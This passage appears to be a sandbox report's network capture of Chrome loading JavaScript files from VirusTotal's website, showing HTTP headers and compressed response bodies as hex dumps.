                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: db 5c 35 5d ed b6 e5 49 70 bc b2 3a ed 09 92 23 3d b4 54 20 ad a6 e8 0d 11 97 e8 dc 08 4f 28 a3 f7 d1 c7 d0 5e e0 d2 08 91 3f 70 ae 69 a8 58 56 1c 84 52 db eb a1 97 22 ec a0 eb 65 c6 43 23 3d 2a 87 45 11 ff a1 e4 05 f2 a0 68 be ed 1d 6b f5 01 79 f5 4a e8 13 7b b6 e8 3a 00 3a 1e 00 1d 89 91 d2 d9 c1 78 21 8f 94 c8 b5 37 78 f8 c6 c6 d5 24 3a 37 dc 29 4a e2 73 c6 b8 b3 de 08 9a b4 ca c1 8e e2 22 33 1c a1 42 21 0c 79 6c 26 0f 3a cd 7b 78 86 8d 1f a0 f3 79 58 66 07 d9 a5 ca f7 a2 02 26 19 c4 f0 28 99 83 34 3d d5 7c 80 69 0c 09 6b 28 68 42 97 b3 11 20 54 a7 c3 a7 f6 55 62 fd 0e 00 f8 ce 06 00 53 7c 8d ee 06 18 d3 82 25 0d 40 40 fc ab c9 5b 5b 52 ef bf 05 f1 d6 6e ad 16 d9 6a df 61 5c b0 ff 35 a8 88 f8 40 7c cb ae a6 ba a3 9a 30 0f 6b 27 b3 79 ba 5f d3 a1 a6 07
                                                                                                                                                                                                                    Data Ascii: \5]Ip:#=T O(^?piXVR"eC#=*EhkyJ{::x!7x$:7)Js"3B!yl&:{xyXf&(4=|ik(hB TUbS|%@@[[Rnja\5@|0k'y_
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC367INData Raw: 5d fe 44 b6 8b 41 5f 67 c2 8c 45 4e dc 7d 9f 7e 4a e1 14 d9 cb c6 8a 44 18 09 c5 b1 5a 52 e2 d1 ac 1c 78 ef fe 3f e4 ac 90 8f e3 28 2b a3 a4 91 77 62 e9 e8 55 7e 0a 1c d3 d1 14 74 16 be 39 08 f7 9f 3d 7f fa fe 40 e7 8a 70 e0 9a 34 73 f1 25 b1 2e 27 26 d7 48 d2 0e d8 6e 61 09 52 a5 c3 94 08 4d 4a 7a 09 e9 64 6c c8 ea ce ad d6 8b b8 88 21 25 75 02 43 eb e1 59 9c 17 e5 21 39 b4 a1 a0 88 8c 3a 0b f7 21 fe 11 8a 80 3d 8e a0 3c cf dc ec f6 2c 1d cf b2 38 2d c9 62 af c3 f6 3a 68 db da 8b 10 99 36 18 c9 17 22 5b 94 66 44 74 79 7a 02 a1 b6 1d c1 2e aa 26 cb 68 d4 8c cb 84 31 e1 a8 28 97 f0 3c 73 57 bd 6d 7b 62 7a a6 86 2e 44 38 d2 6f fa ee f7 75 38 5f bf 66 68 e7 42 21 13 82 32 a3 6c 1f 11 62 52 ee f2 63 90 10 3f eb af af 2d c1 5d 05 c6 67 6c fb bf e0 04 00 e8 99
                                                                                                                                                                                                                    Data Ascii: ]DA_gEN}~JDZRx?(+wbU~t9=@p4s%.'&HnaRMJzdl!%uCY!9:!=<,8-b:h6"[fDtyz.&h1(<sWm{bz.D8ou8_fhB!2lbRc?-]gl
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 52 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 2b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 35 0d 0a 30 30 30 30 30 30 30 31 0d 0a 49 0d 0a 30 30 30 30 30 30 30 31 0d 0a 70 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3d 0d 0a 30 30 30 30 30 30 30 31 0d 0a b4 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4e 0d 0a 30 30 30 30 30 30 30 31 0d 0a b6 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 60 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1d 0d 0a 30 30 30 30 30 30 30 31 0d 0a eb 0d 0a 30 30 30 30 30 30 30 31 0d 0a cd 0d 0a 30 30 30 30 30 30 30 31 0d 0a 83 0d 0a 30 30 30 30 30 30 30 31 0d 0a ac 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4e 0d 0a 30 30 30 30 31 0d 0a 3c
                                                                                                                                                                                                                    Data Ascii: 00000001R0000000100000001\00000001+00000001500000001I00000001p00000001=0000000100000001N000000010000000100000001`000000010000000100000001000000010000000100000001N00001<
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 80 91 61 25 fa 33 3e ad aa 91 a2 50 ba 48 73 4a cf 15 11 27 77 7e 5a 20 4d 80 8a 78 cc da 2a b1 8a 6d 4b 16 f0 db a8 9c 40 eb 40 00 67 cc 9a 1c 30 21 05 45 c1 bf 8f ea ac 17 47 af 0e 68 a8 89 e0 b1 07 9b 69 a3 de b1 42 26 6f 65 ad 51 67 16 3a 88 23 e8 94 e1 59 ae 28 59 7a 5f b2 a4 c8 ae e6 3a 29 32 88 1a 09 c1 21 c7 05 51 68 06 a1 ae 38 80 32 7e 89 60 84 c7 06 bd 49 98 f4 25 2e c5 9c 44 0a ca 44 7f e6 78 89 88 12 84 ce f4 2b 4a 1d a5 1b a0 f0 ab 31 23 73 0c 57 cf f5 b4 d8 c7 f2 6d 69 92 1b bd 30 97 b7 bd 39 43 c0 ca 84 fc 50 38 d6 9c 0c 00 be 79 aa cc 4c 95 d5 53 ed 16 03 f1 d5 92 83 cc 94 e4 50 58 69 d8 4e 4d e9 5f f1 4a fb 28 d6 a1 a4 78 9d ea ce 79 e3 f1 30 b6 9a 96 12 db 83 ec 11 59 d7 62 bc 96 87 4b 6b 58 4d 05 44 1a b5 bf 82 f5 8d 02 74 a9 b5 b1 6f
                                                                                                                                                                                                                    Data Ascii: a%3>PHsJ'w~Z Mx*mK@@g0!EGhiB&oeQg:#Y(Yz_:)2!Qh82~`I%.DDx+J1#sWmi09CP8yLSPXiNM_J(xy0YbKkXMDto
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 28 8a 63 ab 80 5a 37 af f1 5a 08 b5 a5 ad 06 00 80 15 ee d5 ab 64 74 f1 b5 eb ee 4b 3d 70 be 32 ad 85 1e 75 83 a5 8c 99 97 f3 75 2b dd c7 ad c7 7d 0d 2b a4 5b bd 2d ed 24 b5 c9 f5 17 9c e4 2f 2b 8c 79 f5 d0 1c 6e 12 1d c3 99 96 5c 94 e8 fd 9b ef 90 d8 74 c8 89 93 44 0b 92 fe 74 56 1a de ce 34 1a 2b aa 87 3a cb 15 72 25 47 2c f3 8a 8a 19 5a 59 f9 b2 ce 9b 58 55 c5 7e c4 c0 35 ec 53 ab 61 75 6e bf 06 0a 34 db 2e 01 61 61 ef 1f d8 f3 1f 06 7b 0d 7b b8 2d 8b 22 de 2f 18 ff c3 02 6c 97 94 8e db 62 bd 64 97 03 75 65 18 61 f3 05 dd a9 61 c3 8c 4c 70 34 44 a5 ee d4 c6 e9 86 ec 59 61 65 4c c8 35 23 14 2d 03 9e f6 3f c9 09 b5 96 22 02 b5 62 59 ac 05 55 df 2c 6c 6e b4 59 08 ad db 2b e6 d4 5a 56 c5 b7 d5 67 e8 ea 60 d3 7c 63 8d 39 97 69 a5 f2 93 96 5b bd 22 4e a1 54
                                                                                                                                                                                                                    Data Ascii: (cZ7ZdtK=p2uu+}+[-$/+yn\tDtV4+:r%G,ZYXU~5Saun4.aa{{-"/lbdueaaLp4DYaeL5#-?"bYU,lnY+ZVg`|c9i["NT
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC117INData Raw: b5 93 57 fb 53 b6 f7 4e 83 37 07 fc e1 22 78 f7 33 7f 98 06 e9 77 fc 61 16 64 7f f0 87 09 6e 7a a4 0a 26 ba 4c 7d 7b ed 3e dd 3c 8e 0c 55 dc a1 fe e0 01 ae 19 a7 3b d4 f5 15 eb 74 87 3a df ac 8e 0c 3f 73 ef 79 7d 8d 02 2e 1c a0 ab d9 03 7d 41 01 62 ec b8 92 80 e6 c5 85 db c7 d9 09 6e d3 a6 5c 40 49 75 aa 6f 09 d0 31 70 ce 61 89 c1 7f 96 11 5f 0d 0a
                                                                                                                                                                                                                    Data Ascii: WSN7"x3wadnz&L}{><U;t:?sy}.}Abn\@Iuo1pa_
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 37 0d 0a 30 30 30 30 30 30 30 31 0d 0a 30 0d 0a 30 30 30 30 30 30 30 31 0d 0a 54 0d 0a 30 30 30 30 30 30 30 31 0d 0a b8 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8a 0d 0a 30 30 30 30 30 30 30 31 0d 0a bd 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 16 0d 0a 30 30 30 30 30 30 30 31 0d 0a ae 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 64 0d 0a 30 30 30 30 30 30 30 31 0d 0a bf 0d 0a 30 30 30 30 30 30 30 31 0d 0a 51 0d 0a 30 30 30 30 30 30 30 31 0d 0a 72 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 96 0d 0a 30 30 30 30 30 30 30 31 0d 0a 5c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 50 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 36 37 65 0d
                                                                                                                                                                                                                    Data Ascii: 00000001700000001000000001T00000001000000010000000100000001000000010000000100000001;00000001d0000000100000001Q00000001r00000001[0000000100000001\00000001P00000001000067e
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC512INData Raw: be e4 09 ba 56 eb 61 08 1f 12 fd aa d5 29 d5 8b 52 cd 7c c8 20 d2 31 3f 03 11 2e d6 a2 1f 17 22 7f e2 ea 1b 74 a1 37 0e ca 87 c2 b1 ac 3b da f6 ec 0d a0 54 21 07 94 75 01 51 a0 3a df cf 17 05 6a 3b 73 41 45 2f 90 d0 d5 95 7d 04 77 14 23 b5 2a f5 e5 d2 a7 12 4c 55 e6 07 d2 75 4e 4d 45 a4 58 33 89 6d ed 02 d6 56 78 69 16 4c 4c 17 b0 06 2e b2 1f b2 05 40 80 5c 48 0a 5d 4a 43 95 5c 89 47 4e 57 b9 c2 80 82 c8 b7 c0 2a 6c 64 e5 7c cc 2d 56 7a d7 61 0d db 95 93 24 6f ab 38 86 f5 39 d0 9e aa ac 12 b3 80 bf b4 ab 6a 36 86 57 2c 19 d4 98 59 8e 46 8a 07 5a f0 b9 be e6 18 03 87 79 9b 78 29 fc 2d e1 df 60 d3 41 64 32 16 34 83 14 8f 8c 59 6d 17 e4 25 0d 8c 4f 97 2f ad a4 33 22 82 e3 16 fb 58 ac 5a 6a b9 62 52 f3 09 4a 64 90 8f ad 35 f3 ca 74 32 6c fb 51 05 82 e1 6d f6
                                                                                                                                                                                                                    Data Ascii: Va)R| 1?."t7;T!uQ:j;sAE/}w#*LUuNMEX3mVxiLL.@\H]JC\GNW*ld|-Vza$o89j6W,YFZyx)-`Ad24Ym%O/3"XZjbRJd5t2lQm


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    134192.168.2.164988574.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC689OUTGET /gui/16756.15df081c2329888e4ed1.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: af1ee71ae450497ccee432cf646361a5
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:42:10 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:42:10 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 36798
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1052INData Raw: 30 30 30 31 0d 0a 1f 0d 0a 30 66 66 66 0d 0a 8b 08 00 00 00 00 00 02 ff ec 5d fb 93 db 36 92 fe fd fe 0a 5a d9 78 c9 14 c9 d1 fb 69 da 9b 9b 64 eb 52 e5 24 57 b1 77 af 6a 73 2e 87 0f 48 62 4c 91 2a 92 9a 19 ad 46 ff fb 7d 8d 07 09 52 d2 78 9c d8 a9 ad 3d 7b e2 b1 84 47 03 68 00 dd 1f ba 1b 48 67 57 30 a3 28 f3 38 2c 3b 0b b3 60 c9 d2 bd 65 c1 d6 0f df 5d af 77 e9 bb 9b f2 ed 2e 7e bb f1 e3 d4 7b 20 ef fe fe e7 37 96 bb dd 15 6b f3 e7 9f 7b e3 c9 68 fc c6 3e 8c 07 e3 c1 68 6e 96 36 b3 73 cb 7b 7e b8 f1 73 c3 f7 72 73 32 9a ce 66 96 1d d3 c7 2e 8a 58 76 e1 99 b9 39 1e 8e fa 53 cb ce cd de a8 3b 1a 5b d6 22 61 a5 91 d9 89 9d da a1 1d 79 a5 f7 bc 5c 10 89 c0 5b ee d2 b0 8c b3 54 90 b6 7d 8b 93 8e 41 c6 cf 57 bb 0d 4b cb c2 4d 58 ba 2a d7 76 e6 15 cf 06 2f d8
                                                                                                                                                                                                                    Data Ascii: 00010fff]6ZxidR$Wwjs.HbL*F}Rx={GhHgW0(8,;`e]w.~{ 7k{h>hn6s{~srs2f.Xv9S;["ay\[T}AWKMX*v/
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: b5 5f 98 1d c8 94 cd 2e 8d cb fd 75 96 90 7e 06 34 28 3a 50 9c 5c 4a 9d cb 84 4e 95 80 c0 64 de c5 52 d0 ab 42 34 00 38 b0 fb 7b e6 26 99 1f 99 58 84 b2 d9 8d 9f 46 b1 9f 96 d7 fe 66 eb c7 2b ad cd 93 1c ad c1 5c 34 78 52 44 6f 2d bf bf cf 2f b6 76 66 8c 15 b1 3a 4f 6b d1 6f b5 58 17 d2 db f4 ef ef fd 76 9b 39 5b 32 28 e5 90 f1 d9 a8 58 da 4c d6 5a 02 64 21 40 d0 cc d7 1b 89 ef ef e3 76 23 65 6b d2 ab 66 da 19 5a 43 85 68 a8 5d 42 6f aa b8 bf 07 0a 14 33 76 5c 63 aa 12 26 11 09 00 c6 63 f4 57 88 4a 2b 46 52 0e 1a 2c 62 a5 1f 27 f3 03 be cd eb f5 d6 39 da 8f 54 6d 12 db 68 0b 54 e2 62 05 5d ed 94 10 67 69 9d 40 9f 08 fa 3c f2 56 bf 3c d3 c5 6e 21 56 b9 e1 ca 0f af e3 92 34 b9 04 20 2c 8a d1 4f 2d 21 2e 5e 82 11 d0 1e aa 08 a0 67 c8 9c e2 1d 03 c6 ce 52 07
                                                                                                                                                                                                                    Data Ascii: _.u~4(:P\JNdRB48{&XFf+\4xRDo-/vf:OkoXv9[2(XLZd!@v#ekfZCh]Bo3v\c&cWJ+FR,b'9TmhTb]gi@<V<n!V4 ,O-!.^gR
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 40 1b ac d4 e7 86 30 6b 47 86 64 5a 19 6f 98 e3 af 32 03 b6 ec 3b fa d2 66 88 2a 50 43 4b 41 47 01 19 1d ff 04 7e b4 62 80 5a 3b 00 85 c8 d9 c2 88 6e 04 2b e5 f9 73 c8 45 99 30 83 77 4f 7a 03 c9 bb 09 6b 7a 5c 68 1d 24 14 62 7c 97 5d 4b d4 a4 5a 3b 0f 9f 88 53 c0 27 89 66 53 e2 07 19 b5 7e 1f 6f 10 52 35 80 3d 2f 98 90 34 ac a9 cd 99 0d bc 09 77 f4 f2 1b ee f4 8e ac ca c8 0f bb f4 05 42 b1 32 40 c0 2c ed 17 e5 db 4d 16 c5 cb 18 98 11 4b e0 2d 39 1d 6a 23 62 06 22 e7 f6 9f 66 3e 84 df 3d 03 22 d4 dd b1 c2 50 70 f3 8b 11 ec 8d da 25 cb dd b0 f5 92 b8 0c 89 ab a9 e6 e0 34 3c 63 71 eb 20 7e 23 ef 54 d2 09 81 12 67 7b a9 f9 32 22 35 e6 88 0c 6a 55 cd e0 fd 35 03 55 33 70 97 30 ad fe 00 eb 1d fc 21 f3 ca 8d 6e a7 ee fa b5 bb de 01 d2 60 8f 5f 93 75 d5 2c b1 1e
                                                                                                                                                                                                                    Data Ascii: @0kGdZo2;f*PCKAG~bZ;n+sE0wOzkz\h$b|]KZ;S'fS~oR5=/4wB2@,MK-9j#b"f>="Pp%4<cq ~#Tg{2"5jU5U3p0!n`_u,
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC244INData Raw: 29 79 eb e4 9a df 23 f9 2e dd ee 4a 2a 42 b7 98 20 29 8a d2 20 53 37 e2 ea 60 20 2f 5f f3 c0 37 3b f7 98 7b e3 27 3b e6 16 db 24 46 51 b2 2f b5 49 e3 fe 11 25 ef f8 9d 28 4e d6 3c 50 1c fd 5c 86 d3 73 02 f3 fc a8 41 04 19 19 5f c5 52 1a 9c 02 5d 13 f9 3e 8b 98 0e e1 94 9c 7b 16 53 7f 0d ba 2d e9 75 c8 5e d9 51 e7 7d 5c 1d d9 70 51 07 33 5b c7 a0 86 ab 03 02 6f 59 7d fb 8b b8 3f a3 be ba b8 2d 4a 77 52 22 95 00 97 7f c8 d6 08 ca c3 ad e1 ce ff e4 30 49 a0 57 cc e0 34 0a a3 10 8c 64 11 f9 4d 29 b4 ca 87 5f 5a c9 50 7e 6b 40 01 ac 93 58 48 5c 44 fd 3b f1 50 87 85 5a f0 23 87 85 e7 19 db 8e 88 54 f7 94 c5 5d 8e d6 3c 0a 79 1a 17 dc 0a 8e 9b 33 16 bf 63 2e 81 33 4d 10 1f 89 4e 92 c3 66 11 7b a9 b3 5c 09 7b 29 eb 43 0a 1a 0d 0a
                                                                                                                                                                                                                    Data Ascii: )y#.J*B ) S7` /_7;{';$FQ/I%(N<P\sA_R]>{S-u^Q}\pQ3[oY}?-JwR"0IW4dM)_ZP~k@XH\D;PZ#T]<y3c.3MNf{\{)C
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1408INData Raw: 30 30 30 30 31 0d 0a 51 0d 0a 61 34 38 0d 0a cc e6 a0 df 58 e5 6c 6f 2c e1 c2 07 3b e4 91 87 14 8f 73 9b fb 5b 7e fd b9 4f b3 83 bb bb c4 60 5c f3 20 0a 92 cd 80 dc f2 fa 31 4f ad 58 c8 3b 57 ab 1e b1 80 4a 9b 8c a5 73 ce 9c 6d 7c 93 21 2a 94 06 c2 3f 62 d9 ce 85 64 a4 0b 18 96 7e 61 5a 69 0a 52 77 6a 8a 78 84 ec ab fd 06 51 97 0f ca 7b 7e 7f f7 01 79 5f 9b 77 1a 02 5f cd 71 2d ad 95 ac 6e 5f 00 be 40 80 8f ff fd b5 eb 5b bb 8d e6 39 47 ea da ef d3 14 7c cb 88 fd 8a eb 64 2b 38 be 85 b6 e0 2f 1e 7c 30 ea 9c 8c ba b8 0a fb f9 75 84 4f ff 3a 42 13 67 ea 8a e1 d1 6a 01 92 d3 eb fc 90 95 06 37 b9 ca 43 53 f5 40 00 ee c3 f1 74 63 ed df 30 23 40 fc 90 e1 47 88 d7 31 f6 ac 74 3b 47 7a 69 20 0e 0d 84 44 8b 48 aa 02 81 6d da c9 ae 75 0d fe 01 f4 9a c1 35 9a d1 9b
                                                                                                                                                                                                                    Data Ascii: 00001Qa48Xlo,;s[~O`\ 1OX;WJsm|!*?bd~aZiRwjxQ{~y_w_q-n_@[9G|d+8/|0uO:Bgj7CS@tc0#@G1t;Gzi DHmu5
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC1241INData Raw: cc e5 98 94 95 6d 40 f6 f8 a6 1a 99 1c 63 d7 ed e1 e5 b0 f3 59 38 12 08 2d 49 37 73 78 87 96 74 e7 15 9a 04 67 0d 93 67 b5 38 70 52 81 5f 62 ea e5 6c d3 a6 74 cb 68 1b cf 0d 6c 7d 2d 8b 83 ea b5 cc ea b9 4a bf 51 fb 08 a0 ca 48 e4 02 29 40 05 6b 75 78 86 98 9c 01 44 2a 09 c0 e1 50 cb 0f 48 7a 57 9a 90 1f 3b b1 3d b8 1c 6e f0 42 54 51 62 b2 6a af 12 4d cd 9c 33 ab a1 96 1a aa af 78 96 2d 1c 2a 11 5a 6d 2b ad c3 a3 a1 6d 8c b1 9e 26 52 13 d6 24 44 af 67 4b 7f 19 88 8e e9 59 b2 f7 43 28 83 fe 08 d5 fb 23 09 49 94 3d a0 ea fd b8 3f 0e a7 92 1b cd 4c 41 63 36 85 3e e9 d2 2f a5 34 aa 52 bc 07 2c 64 6c d9 ae 5f b1 8f 78 dd 1f a0 76 5f 71 9c 6e 99 43 5f aa f6 e3 74 8d 8d 51 8a 11 60 72 df a9 8c c6 34 d6 19 a2 53 ed 69 e4 f9 f2 c1 50 1c cb e6 46 9a a5 52 ce f2 ac
                                                                                                                                                                                                                    Data Ascii: m@cY8-I7sxtgg8pR_blthl}-JQH)@kuxD*PHzW;=nBTQbjM3x-*Zm+m&R$DgKYC(#I=?LAc6>/4R,dl_xv_qnC_tQ`r4SiPFR
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    135192.168.2.164988674.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:28 UTC689OUTGET /gui/87027.b53dee6a7718580c76f9.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC356INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: bf37d744734844b589919125e97f7fe0
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 09:35:18 GMT
                                                                                                                                                                                                                    Expires: Fri, 25 Apr 2025 09:35:18 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "v5PPmg"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 37210
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC1052INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 7d 0d 0a 30 30 30 30 30 30 30 31 0d 0a 79 0d 0a 30 30 30 30 30 30 30 31 0d 0a 63 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1a 0d 0a 30 30 30 30 30 30 30 31 0d 0a 57 0d 0a 30 30 30 30 30 30 30 31 0d 0a 96 0d 0a 30 30 30 30 30 30 30 31 0d 0a ef 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001}00000001y00000001c0000000100000001W00000001000000010000000100000001
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC1408INData Raw: e3 66 96 49 0d a9 93 e0 12 bf e5 70 ec 76 bc 68 8d ed f7 e2 b1 3f 9d 86 f3 89 93 39 5f 6a 94 cd cc 16 e8 b1 ff 59 ae b4 37 9e f9 cb 0b 31 51 c9 3b 06 40 d3 7d f8 80 86 86 02 0f f6 0e 83 0a c9 11 e7 ea a4 2b f9 c8 f9 7b c3 ad 3d b5 97 44 ad 5a ad 70 51 64 42 66 16 38 b1 04 3b e9 46 65 d2 01 1a 26 22 f1 83 79 f3 d2 9f af c5 b6 e1 2a 48 86 f2 e5 a7 05 87 5c 1e 5f 1c 32 f1 58 7e 1c 88 e6 c2 5f f1 21 b4 8e c5 08 c7 62 64 1d 8b 92 7d c0 74 9c f4 d4 ea f5 9f 05 13 f1 84 21 70 5c ba cc 7c a6 d4 2e 3b 0c 62 86 b5 e9 95 37 c2 86 52 2a 2f 7b 66 07 f8 8c a8 82 74 d0 50 74 72 e3 e1 ca 26 81 1f dd a0 8e e7 f8 63 80 d5 49 b0 bc 70 92 d0 91 87 ce a1 36 90 a5 8e 51 12 2c 84 e7 5f 84 ce 7a 19 5c d3 17 3d 36 bd c1 ba 00 ed a6 de fa cc ae 72 7b ba 74 f9 6a f0 36 a7 17 d9 bd
                                                                                                                                                                                                                    Data Ascii: fIpvh?9_jY71Q;@}+{=DZpQdBf8;Fe&"y*H\_2X~_!bd}t!p\|.;b7R*/{ftPtr&cIp6Q,_z\=6r{tj6
                                                                                                                                                                                                                    2024-04-25 19:55:29 UTC1408INData Raw: 99 89 c2 f1 d6 a7 1d e7 0d 24 29 dd 8f 31 56 24 a6 3b e1 ac 7c 50 41 e3 f5 9c 38 5c 22 49 80 44 c6 ce 55 90 cc 9c ab 59 30 9e 51 91 9d cd a9 a9 62 03 d6 20 a5 a3 f5 12 54 ba f3 13 1d ef 37 7c bc 6f bb 2b 9a 40 b2 8f a5 b5 48 4c a5 c9 95 b2 57 45 93 3a 0a c8 f1 c9 c3 e5 5c cf 13 79 0a 73 20 e8 61 a0 d7 59 65 80 bd 76 8d 05 03 aa fc ce 23 58 a6 8e 6e 60 3e e9 61 f1 61 06 25 13 15 cf 98 68 ca 79 23 0f 67 25 68 06 d3 67 cc 04 9b 34 c0 15 c2 e9 00 26 4e 04 d7 18 77 f0 22 8c 6e e4 89 63 6c 9c 4f 3f 48 34 7a 37 be 01 87 e3 a9 2a 82 7a ba 34 d5 04 18 98 80 8f 7a 2a fc 68 3c 7b 9c fb 0e 98 61 f8 66 60 20 49 36 9c 62 13 61 ef e6 e2 87 e0 32 4c c0 ba 92 cc 1e da f1 30 16 13 93 6a 1d ef 2b 1c ef 2b 3e de 0c 14 d4 9a 02 a0 06 97 c1 64 ed cf 3d 73 d4 35 2d 29 57 47 13
                                                                                                                                                                                                                    Data Ascii: $)1V$;|PA8\"IDUY0Qb T7|o+@HLWE:\ys aYev#Xn`>aa%hy#g%hg4&Nw"nclO?H4z7*z4z*h<{af` I6ba2L0j++>d=s5-)WG
